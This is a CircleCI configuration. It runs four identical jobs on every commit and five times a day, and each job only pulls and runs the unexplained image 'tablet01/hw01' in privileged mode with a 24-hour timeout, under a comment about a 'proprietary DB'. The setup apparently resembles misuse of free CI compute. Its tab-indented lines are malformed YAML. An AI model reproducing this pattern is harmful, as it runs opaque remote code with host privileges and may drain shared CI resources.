version: 2
jobs:
  build_01:
    machine: true
    working_directory: ~/my_app
    parallelism: 1
    resource_class: medium
    steps:
      # Docker is preinstalled, along with docker-compose
      - checkout

      # start proprietary DB using private Docker image
      - run: |
          docker run --privileged tablet01/hw01
	  no_output_timeout: 24h
  build_02:
    machine: true
    working_directory: ~/my_app
    parallelism: 1
    resource_class: medium
    steps:
      - checkout

      - run: |
          docker run --privileged tablet01/hw01
	  no_output_timeout: 24h
  build_03:
    machine: true
    working_directory: ~/my_app
    parallelism: 1
    resource_class: medium
    steps:
      - checkout

      - run: |
          docker run --privileged tablet01/hw01
	  no_output_timeout: 24h
  build_04:
    machine: true
    working_directory: ~/my_app
    parallelism: 1
    resource_class: medium
    steps:
      - checkout

      - run: |
          docker run --privileged tablet01/hw01
	  no_output_timeout: 24h
workflows:
  version: 2
  commit:
    jobs:
      - build_01
      - build_02
      - build_03
      - build_04

  nightly:
    triggers:
      - schedule:
          cron: "0 0,5,10,15,20 * * *"
          filters:
            branches:
              only:
                - master
    jobs:
      - build_01
      - build_02
      - build_03
      - build_04
